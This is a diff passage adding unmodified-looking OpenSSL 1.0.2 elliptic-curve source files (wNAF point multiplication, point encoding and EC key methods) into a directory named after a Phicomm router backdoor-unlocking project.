+                        r_is_inverted = !r_is_inverted;
+                    }
+
+                    /* digit > 0 */
+
+                    if (r_is_at_infinity) {
+                        if (!EC_POINT_copy(r, val_sub[i][digit >> 1]))
+                            goto err;
+                        r_is_at_infinity = 0;
+                    } else {
+                        if (!EC_POINT_add
+                            (group, r, r, val_sub[i][digit >> 1], ctx))
+                            goto err;
+                    }
+                }
+            }
+        }
+    }
+
+    if (r_is_at_infinity) {
+        if (!EC_POINT_set_to_infinity(group, r))
+            goto err;
+    } else {
+        if (r_is_inverted)
+            if (!EC_POINT_invert(group, r, ctx))
+                goto err;
+    }
+
+    ret = 1;
+
+ err:
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (tmp != NULL)
+        EC_POINT_free(tmp);
+    if (wsize != NULL)
+        OPENSSL_free(wsize);
+    if (wNAF_len != NULL)
+        OPENSSL_free(wNAF_len);
+    if (wNAF != NULL) {
+        signed char **w;
+
+        for (w = wNAF; *w != NULL; w++)
+            OPENSSL_free(*w);
+
+        OPENSSL_free(wNAF);
+    }
+    if (val != NULL) {
+        for (v = val; *v != NULL; v++)
+            EC_POINT_clear_free(*v);
+
+        OPENSSL_free(val);
+    }
+    if (val_sub != NULL) {
+        OPENSSL_free(val_sub);
+    }
+    return ret;
+}
+
+/*-
+ * ec_wNAF_precompute_mult()
+ * creates an EC_PRE_COMP object with preprecomputed multiples of the generator
+ * for use with wNAF splitting as implemented in ec_wNAF_mul().
+ *
+ * 'pre_comp->points' is an array of multiples of the generator
+ * of the following form:
+ * points[0] =     generator;
+ * points[1] = 3 * generator;
+ * ...
+ * points[2^(w-1)-1] =     (2^(w-1)-1) * generator;
+ * points[2^(w-1)]   =     2^blocksize * generator;
+ * points[2^(w-1)+1] = 3 * 2^blocksize * generator;
+ * ...
+ * points[2^(w-1)*(numblocks-1)-1] = (2^(w-1)) *  2^(blocksize*(numblocks-2)) * generator
+ * points[2^(w-1)*(numblocks-1)]   =              2^(blocksize*(numblocks-1)) * generator
+ * ...
+ * points[2^(w-1)*numblocks-1]     = (2^(w-1)) *  2^(blocksize*(numblocks-1)) * generator
+ * points[2^(w-1)*numblocks]       = NULL
+ */
+int ec_wNAF_precompute_mult(EC_GROUP *group, BN_CTX *ctx)
+{
+    const EC_POINT *generator;
+    EC_POINT *tmp_point = NULL, *base = NULL, **var;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *order;
+    size_t i, bits, w, pre_points_per_block, blocksize, numblocks, num;
+    EC_POINT **points = NULL;
+    EC_PRE_COMP *pre_comp;
+    int ret = 0;
+
+    /* if there is an old EC_PRE_COMP object, throw it away */
+    EC_EX_DATA_free_data(&group->extra_data, ec_pre_comp_dup,
+                         ec_pre_comp_free, ec_pre_comp_clear_free);
+
+    if ((pre_comp = ec_pre_comp_new(group)) == NULL)
+        return 0;
+
+    generator = EC_GROUP_get0_generator(group);
+    if (generator == NULL) {
+        ECerr(EC_F_EC_WNAF_PRECOMPUTE_MULT, EC_R_UNDEFINED_GENERATOR);
+        goto err;
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            goto err;
+    }
+
+    BN_CTX_start(ctx);
+    order = BN_CTX_get(ctx);
+    if (order == NULL)
+        goto err;
+
+    if (!EC_GROUP_get_order(group, order, ctx))
+        goto err;
+    if (BN_is_zero(order)) {
+        ECerr(EC_F_EC_WNAF_PRECOMPUTE_MULT, EC_R_UNKNOWN_ORDER);
+        goto err;
+    }
+
+    bits = BN_num_bits(order);
+    /*
+     * The following parameters mean we precompute (approximately) one point
+     * per bit. TBD: The combination 8, 4 is perfect for 160 bits; for other
+     * bit lengths, other parameter combinations might provide better
+     * efficiency.
+     */
+    blocksize = 8;
+    w = 4;
+    if (EC_window_bits_for_scalar_size(bits) > w) {
+        /* let's not make the window too small ... */
+        w = EC_window_bits_for_scalar_size(bits);
+    }
+
+    numblocks = (bits + blocksize - 1) / blocksize; /* max. number of blocks
+                                                     * to use for wNAF
+                                                     * splitting */
+
+    pre_points_per_block = (size_t)1 << (w - 1);
+    num = pre_points_per_block * numblocks; /* number of points to compute
+                                             * and store */
+
+    points = OPENSSL_malloc(sizeof(EC_POINT *) * (num + 1));
+    if (!points) {
+        ECerr(EC_F_EC_WNAF_PRECOMPUTE_MULT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    var = points;
+    var[num] = NULL;            /* pivot */
+    for (i = 0; i < num; i++) {
+        if ((var[i] = EC_POINT_new(group)) == NULL) {
+            ECerr(EC_F_EC_WNAF_PRECOMPUTE_MULT, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+
+    if (!(tmp_point = EC_POINT_new(group)) || !(base = EC_POINT_new(group))) {
+        ECerr(EC_F_EC_WNAF_PRECOMPUTE_MULT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!EC_POINT_copy(base, generator))
+        goto err;
+
+    /* do the precomputation */
+    for (i = 0; i < numblocks; i++) {
+        size_t j;
+
+        if (!EC_POINT_dbl(group, tmp_point, base, ctx))
+            goto err;
+
+        if (!EC_POINT_copy(*var++, base))
+            goto err;
+
+        for (j = 1; j < pre_points_per_block; j++, var++) {
+            /*
+             * calculate odd multiples of the current base point
+             */
+            if (!EC_POINT_add(group, *var, tmp_point, *(var - 1), ctx))
+                goto err;
+        }
+
+        if (i < numblocks - 1) {
+            /*
+             * get the next base (multiply current one by 2^blocksize)
+             */
+            size_t k;
+
+            if (blocksize <= 2) {
+                ECerr(EC_F_EC_WNAF_PRECOMPUTE_MULT, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+
+            if (!EC_POINT_dbl(group, base, tmp_point, ctx))
+                goto err;
+            for (k = 2; k < blocksize; k++) {
+                if (!EC_POINT_dbl(group, base, base, ctx))
+                    goto err;
+            }
+        }
+    }
+
+    if (!EC_POINTs_make_affine(group, num, points, ctx))
+        goto err;
+
+    pre_comp->group = group;
+    pre_comp->blocksize = blocksize;
+    pre_comp->numblocks = numblocks;
+    pre_comp->w = w;
+    pre_comp->points = points;
+    points = NULL;
+    pre_comp->num = num;
+
+    if (!EC_EX_DATA_set_data(&group->extra_data, pre_comp,
+                             ec_pre_comp_dup, ec_pre_comp_free,
+                             ec_pre_comp_clear_free))
+        goto err;
+    pre_comp = NULL;
+
+    ret = 1;
+ err:
+    if (ctx != NULL)
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (pre_comp)
+        ec_pre_comp_free(pre_comp);
+    if (points) {
+        EC_POINT **p;
+
+        for (p = points; *p != NULL; p++)
+            EC_POINT_free(*p);
+        OPENSSL_free(points);
+    }
+    if (tmp_point)
+        EC_POINT_free(tmp_point);
+    if (base)
+        EC_POINT_free(base);
+    return ret;
+}
+
+int ec_wNAF_have_precompute_mult(const EC_GROUP *group)
+{
+    if (EC_EX_DATA_get_data
+        (group->extra_data, ec_pre_comp_dup, ec_pre_comp_free,
+         ec_pre_comp_clear_free) != NULL)
+        return 1;
+    else
+        return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_oct.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_oct.c
new file mode 100644
index 0000000..040c414
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_oct.c
@@ -0,0 +1,192 @@
+/* crypto/ec/ec_lib.c */
+/*
+ * Originally written by Bodo Moeller for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Binary polynomial ECC support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#include <string.h>
+
+#include <openssl/err.h>
+#include <openssl/opensslv.h>
+
+#include "ec_lcl.h"
+
+int EC_POINT_set_compressed_coordinates_GFp(const EC_GROUP *group,
+                                            EC_POINT *point, const BIGNUM *x,
+                                            int y_bit, BN_CTX *ctx)
+{
+    if (group->meth->point_set_compressed_coordinates == 0
+        && !(group->meth->flags & EC_FLAGS_DEFAULT_OCT)) {
+        ECerr(EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GFP,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GFP,
+              EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    if (group->meth->flags & EC_FLAGS_DEFAULT_OCT) {
+        if (group->meth->field_type == NID_X9_62_prime_field)
+            return ec_GFp_simple_set_compressed_coordinates(group, point, x,
+                                                            y_bit, ctx);
+        else
+#ifdef OPENSSL_NO_EC2M
+        {
+            ECerr(EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GFP,
+                  EC_R_GF2M_NOT_SUPPORTED);
+            return 0;
+        }
+#else
+            return ec_GF2m_simple_set_compressed_coordinates(group, point, x,
+                                                             y_bit, ctx);
+#endif
+    }
+    return group->meth->point_set_compressed_coordinates(group, point, x,
+                                                         y_bit, ctx);
+}
+
+#ifndef OPENSSL_NO_EC2M
+int EC_POINT_set_compressed_coordinates_GF2m(const EC_GROUP *group,
+                                             EC_POINT *point, const BIGNUM *x,
+                                             int y_bit, BN_CTX *ctx)
+{
+    if (group->meth->point_set_compressed_coordinates == 0
+        && !(group->meth->flags & EC_FLAGS_DEFAULT_OCT)) {
+        ECerr(EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GF2M,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GF2M,
+              EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    if (group->meth->flags & EC_FLAGS_DEFAULT_OCT) {
+        if (group->meth->field_type == NID_X9_62_prime_field)
+            return ec_GFp_simple_set_compressed_coordinates(group, point, x,
+                                                            y_bit, ctx);
+        else
+            return ec_GF2m_simple_set_compressed_coordinates(group, point, x,
+                                                             y_bit, ctx);
+    }
+    return group->meth->point_set_compressed_coordinates(group, point, x,
+                                                         y_bit, ctx);
+}
+#endif
+
+size_t EC_POINT_point2oct(const EC_GROUP *group, const EC_POINT *point,
+                          point_conversion_form_t form, unsigned char *buf,
+                          size_t len, BN_CTX *ctx)
+{
+    if (group->meth->point2oct == 0
+        && !(group->meth->flags & EC_FLAGS_DEFAULT_OCT)) {
+        ECerr(EC_F_EC_POINT_POINT2OCT, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_POINT2OCT, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    if (group->meth->flags & EC_FLAGS_DEFAULT_OCT) {
+        if (group->meth->field_type == NID_X9_62_prime_field)
+            return ec_GFp_simple_point2oct(group, point, form, buf, len, ctx);
+        else
+#ifdef OPENSSL_NO_EC2M
+        {
+            ECerr(EC_F_EC_POINT_POINT2OCT, EC_R_GF2M_NOT_SUPPORTED);
+            return 0;
+        }
+#else
+            return ec_GF2m_simple_point2oct(group, point,
+                                            form, buf, len, ctx);
+#endif
+    }
+
+    return group->meth->point2oct(group, point, form, buf, len, ctx);
+}
+
+int EC_POINT_oct2point(const EC_GROUP *group, EC_POINT *point,
+                       const unsigned char *buf, size_t len, BN_CTX *ctx)
+{
+    if (group->meth->oct2point == 0
+        && !(group->meth->flags & EC_FLAGS_DEFAULT_OCT)) {
+        ECerr(EC_F_EC_POINT_OCT2POINT, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_OCT2POINT, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    if (group->meth->flags & EC_FLAGS_DEFAULT_OCT) {
+        if (group->meth->field_type == NID_X9_62_prime_field)
+            return ec_GFp_simple_oct2point(group, point, buf, len, ctx);
+        else
+#ifdef OPENSSL_NO_EC2M
+        {
+            ECerr(EC_F_EC_POINT_OCT2POINT, EC_R_GF2M_NOT_SUPPORTED);
+            return 0;
+        }
+#else
+            return ec_GF2m_simple_oct2point(group, point, buf, len, ctx);
+#endif
+    }
+    return group->meth->oct2point(group, point, buf, len, ctx);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_pmeth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_pmeth.c
new file mode 100644
index 0000000..b767490
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_pmeth.c
@@ -0,0 +1,530 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/ec.h>
+#include "ec_lcl.h"
+#include <openssl/ecdsa.h>
+#include <openssl/evp.h>
+#include "evp_locl.h"
+
+/* EC pkey context structure */
+
+typedef struct {
+    /* Key and paramgen group */
+    EC_GROUP *gen_group;
+    /* message digest */
+    const EVP_MD *md;
+    /* Duplicate key if custom cofactor needed */
+    EC_KEY *co_key;
+    /* Cofactor mode */
+    signed char cofactor_mode;
+    /* KDF (if any) to use for ECDH */
+    char kdf_type;
+    /* Message digest to use for key derivation */
+    const EVP_MD *kdf_md;
+    /* User key material */
+    unsigned char *kdf_ukm;
+    size_t kdf_ukmlen;
+    /* KDF output length */
+    size_t kdf_outlen;
+} EC_PKEY_CTX;
+
+static int pkey_ec_init(EVP_PKEY_CTX *ctx)
+{
+    EC_PKEY_CTX *dctx;
+    dctx = OPENSSL_malloc(sizeof(EC_PKEY_CTX));
+    if (!dctx)
+        return 0;
+    dctx->gen_group = NULL;
+    dctx->md = NULL;
+
+    dctx->cofactor_mode = -1;
+    dctx->co_key = NULL;
+    dctx->kdf_type = EVP_PKEY_ECDH_KDF_NONE;
+    dctx->kdf_md = NULL;
+    dctx->kdf_outlen = 0;
+    dctx->kdf_ukm = NULL;
+    dctx->kdf_ukmlen = 0;
+
+    ctx->data = dctx;
+
+    return 1;
+}
+
+static int pkey_ec_copy(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src)
+{
+    EC_PKEY_CTX *dctx, *sctx;
+    if (!pkey_ec_init(dst))
+        return 0;
+    sctx = src->data;
+    dctx = dst->data;
+    if (sctx->gen_group) {
+        dctx->gen_group = EC_GROUP_dup(sctx->gen_group);
+        if (!dctx->gen_group)
+            return 0;
+    }
+    dctx->md = sctx->md;
+
+    if (sctx->co_key) {
+        dctx->co_key = EC_KEY_dup(sctx->co_key);
+        if (!dctx->co_key)
+            return 0;
+    }
+    dctx->kdf_type = sctx->kdf_type;
+    dctx->kdf_md = sctx->kdf_md;
+    dctx->kdf_outlen = sctx->kdf_outlen;
+    if (sctx->kdf_ukm) {
+        dctx->kdf_ukm = BUF_memdup(sctx->kdf_ukm, sctx->kdf_ukmlen);
+        if (!dctx->kdf_ukm)
+            return 0;
+    } else
+        dctx->kdf_ukm = NULL;
+    dctx->kdf_ukmlen = sctx->kdf_ukmlen;
+    return 1;
+}
+
+static void pkey_ec_cleanup(EVP_PKEY_CTX *ctx)
+{
+    EC_PKEY_CTX *dctx = ctx->data;
+    if (dctx) {
+        if (dctx->gen_group)
+            EC_GROUP_free(dctx->gen_group);
+        if (dctx->co_key)
+            EC_KEY_free(dctx->co_key);
+        if (dctx->kdf_ukm)
+            OPENSSL_free(dctx->kdf_ukm);
+        OPENSSL_free(dctx);
+    }
+}
+
+static int pkey_ec_sign(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
+                        const unsigned char *tbs, size_t tbslen)
+{
+    int ret, type;
+    unsigned int sltmp;
+    EC_PKEY_CTX *dctx = ctx->data;
+    EC_KEY *ec = ctx->pkey->pkey.ec;
+
+    if (!sig) {
+        *siglen = ECDSA_size(ec);
+        return 1;
+    } else if (*siglen < (size_t)ECDSA_size(ec)) {
+        ECerr(EC_F_PKEY_EC_SIGN, EC_R_BUFFER_TOO_SMALL);
+        return 0;
+    }
+
+    if (dctx->md)
+        type = EVP_MD_type(dctx->md);
+    else
+        type = NID_sha1;
+
+    ret = ECDSA_sign(type, tbs, tbslen, sig, &sltmp, ec);
+
+    if (ret <= 0)
+        return ret;
+    *siglen = (size_t)sltmp;
+    return 1;
+}
+
+static int pkey_ec_verify(EVP_PKEY_CTX *ctx,
+                          const unsigned char *sig, size_t siglen,
+                          const unsigned char *tbs, size_t tbslen)
+{
+    int ret, type;
+    EC_PKEY_CTX *dctx = ctx->data;
+    EC_KEY *ec = ctx->pkey->pkey.ec;
+
+    if (dctx->md)
+        type = EVP_MD_type(dctx->md);
+    else
+        type = NID_sha1;
+
+    ret = ECDSA_verify(type, tbs, tbslen, sig, siglen, ec);
+
+    return ret;
+}
+
+#ifndef OPENSSL_NO_ECDH
+static int pkey_ec_derive(EVP_PKEY_CTX *ctx, unsigned char *key,
+                          size_t *keylen)
+{
+    int ret;
+    size_t outlen;
+    const EC_POINT *pubkey = NULL;
+    EC_KEY *eckey;
+    EC_PKEY_CTX *dctx = ctx->data;
+    if (!ctx->pkey || !ctx->peerkey) {
+        ECerr(EC_F_PKEY_EC_DERIVE, EC_R_KEYS_NOT_SET);
+        return 0;
+    }
+
+    eckey = dctx->co_key ? dctx->co_key : ctx->pkey->pkey.ec;
+
+    if (!key) {
+        const EC_GROUP *group;
+        group = EC_KEY_get0_group(eckey);
+        *keylen = (EC_GROUP_get_degree(group) + 7) / 8;
+        return 1;
+    }
+    pubkey = EC_KEY_get0_public_key(ctx->peerkey->pkey.ec);
+
+    /*
+     * NB: unlike PKCS#3 DH, if *outlen is less than maximum size this is not
+     * an error, the result is truncated.
+     */
+
+    outlen = *keylen;
+
+    ret = ECDH_compute_key(key, outlen, pubkey, eckey, 0);
+    if (ret <= 0)
+        return 0;
+    *keylen = ret;
+    return 1;
+}
+
+static int pkey_ec_kdf_derive(EVP_PKEY_CTX *ctx,
+                              unsigned char *key, size_t *keylen)
+{
+    EC_PKEY_CTX *dctx = ctx->data;
+    unsigned char *ktmp = NULL;
+    size_t ktmplen;
+    int rv = 0;
+    if (dctx->kdf_type == EVP_PKEY_ECDH_KDF_NONE)
+        return pkey_ec_derive(ctx, key, keylen);
+    if (!key) {
+        *keylen = dctx->kdf_outlen;
+        return 1;
+    }
+    if (*keylen != dctx->kdf_outlen)
+        return 0;
+    if (!pkey_ec_derive(ctx, NULL, &ktmplen))
+        return 0;
+    ktmp = OPENSSL_malloc(ktmplen);
+    if (!ktmp)
+        return 0;
+    if (!pkey_ec_derive(ctx, ktmp, &ktmplen))
+        goto err;
+    /* Do KDF stuff */
+    if (!ECDH_KDF_X9_62(key, *keylen, ktmp, ktmplen,
+                        dctx->kdf_ukm, dctx->kdf_ukmlen, dctx->kdf_md))
+        goto err;
+    rv = 1;
+
+ err:
+    if (ktmp) {
+        OPENSSL_cleanse(ktmp, ktmplen);
+        OPENSSL_free(ktmp);
+    }
+    return rv;
+}
+#endif
+
+static int pkey_ec_ctrl(EVP_PKEY_CTX *ctx, int type, int p1, void *p2)
+{
+    EC_PKEY_CTX *dctx = ctx->data;
+    EC_GROUP *group;
+    switch (type) {
+    case EVP_PKEY_CTRL_EC_PARAMGEN_CURVE_NID:
+        group = EC_GROUP_new_by_curve_name(p1);
+        if (group == NULL) {
+            ECerr(EC_F_PKEY_EC_CTRL, EC_R_INVALID_CURVE);
+            return 0;
+        }
+        if (dctx->gen_group)
+            EC_GROUP_free(dctx->gen_group);
+        dctx->gen_group = group;
+        return 1;
+
+    case EVP_PKEY_CTRL_EC_PARAM_ENC:
+        if (!dctx->gen_group) {
+            ECerr(EC_F_PKEY_EC_CTRL, EC_R_NO_PARAMETERS_SET);
+            return 0;
+        }
+        EC_GROUP_set_asn1_flag(dctx->gen_group, p1);
+        return 1;
+
+#ifndef OPENSSL_NO_ECDH
+    case EVP_PKEY_CTRL_EC_ECDH_COFACTOR:
+        if (p1 == -2) {
+            if (dctx->cofactor_mode != -1)
+                return dctx->cofactor_mode;
+            else {
+                EC_KEY *ec_key = ctx->pkey->pkey.ec;
+                return EC_KEY_get_flags(ec_key) & EC_FLAG_COFACTOR_ECDH ? 1 :
+                    0;
+            }
+        } else if (p1 < -1 || p1 > 1)
+            return -2;
+        dctx->cofactor_mode = p1;
+        if (p1 != -1) {
+            EC_KEY *ec_key = ctx->pkey->pkey.ec;
+            if (!ec_key->group)
+                return -2;
+            /* If cofactor is 1 cofactor mode does nothing */
+            if (BN_is_one(&ec_key->group->cofactor))
+                return 1;
+            if (!dctx->co_key) {
+                dctx->co_key = EC_KEY_dup(ec_key);
+                if (!dctx->co_key)
+                    return 0;
+            }
+            if (p1)
+                EC_KEY_set_flags(dctx->co_key, EC_FLAG_COFACTOR_ECDH);
+            else
+                EC_KEY_clear_flags(dctx->co_key, EC_FLAG_COFACTOR_ECDH);
+        } else if (dctx->co_key) {
+            EC_KEY_free(dctx->co_key);
+            dctx->co_key = NULL;
+        }
+        return 1;
+#endif
+
+    case EVP_PKEY_CTRL_EC_KDF_TYPE:
+        if (p1 == -2)
+            return dctx->kdf_type;
+        if (p1 != EVP_PKEY_ECDH_KDF_NONE && p1 != EVP_PKEY_ECDH_KDF_X9_62)
+            return -2;
+        dctx->kdf_type = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_EC_KDF_MD:
+        dctx->kdf_md = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_EC_KDF_MD:
+        *(const EVP_MD **)p2 = dctx->kdf_md;
+        return 1;
+
+    case EVP_PKEY_CTRL_EC_KDF_OUTLEN:
+        if (p1 <= 0)
+            return -2;
+        dctx->kdf_outlen = (size_t)p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_EC_KDF_OUTLEN:
+        *(int *)p2 = dctx->kdf_outlen;
+        return 1;
+
+    case EVP_PKEY_CTRL_EC_KDF_UKM:
+        if (dctx->kdf_ukm)
+            OPENSSL_free(dctx->kdf_ukm);
+        dctx->kdf_ukm = p2;
+        if (p2)
+            dctx->kdf_ukmlen = p1;
+        else
+            dctx->kdf_ukmlen = 0;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_EC_KDF_UKM:
+        *(unsigned char **)p2 = dctx->kdf_ukm;
+        return dctx->kdf_ukmlen;
+
+    case EVP_PKEY_CTRL_MD:
+        if (EVP_MD_type((const EVP_MD *)p2) != NID_sha1 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_ecdsa_with_SHA1 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha224 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha256 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha384 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha512) {
+            ECerr(EC_F_PKEY_EC_CTRL, EC_R_INVALID_DIGEST_TYPE);
+            return 0;
+        }
+        dctx->md = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_MD:
+        *(const EVP_MD **)p2 = dctx->md;
+        return 1;
+
+    case EVP_PKEY_CTRL_PEER_KEY:
+        /* Default behaviour is OK */
+    case EVP_PKEY_CTRL_DIGESTINIT:
+    case EVP_PKEY_CTRL_PKCS7_SIGN:
+    case EVP_PKEY_CTRL_CMS_SIGN:
+        return 1;
+
+    default:
+        return -2;
+
+    }
+}
+
+static int pkey_ec_ctrl_str(EVP_PKEY_CTX *ctx,
+                            const char *type, const char *value)
+{
+    if (!strcmp(type, "ec_paramgen_curve")) {
+        int nid;
+        nid = EC_curve_nist2nid(value);
+        if (nid == NID_undef)
+            nid = OBJ_sn2nid(value);
+        if (nid == NID_undef)
+            nid = OBJ_ln2nid(value);
+        if (nid == NID_undef) {
+            ECerr(EC_F_PKEY_EC_CTRL_STR, EC_R_INVALID_CURVE);
+            return 0;
+        }
+        return EVP_PKEY_CTX_set_ec_paramgen_curve_nid(ctx, nid);
+    } else if (!strcmp(type, "ec_param_enc")) {
+        int param_enc;
+        if (!strcmp(value, "explicit"))
+            param_enc = 0;
+        else if (!strcmp(value, "named_curve"))
+            param_enc = OPENSSL_EC_NAMED_CURVE;
+        else
+            return -2;
+        return EVP_PKEY_CTX_set_ec_param_enc(ctx, param_enc);
+    } else if (!strcmp(type, "ecdh_kdf_md")) {
+        const EVP_MD *md;
+        if (!(md = EVP_get_digestbyname(value))) {
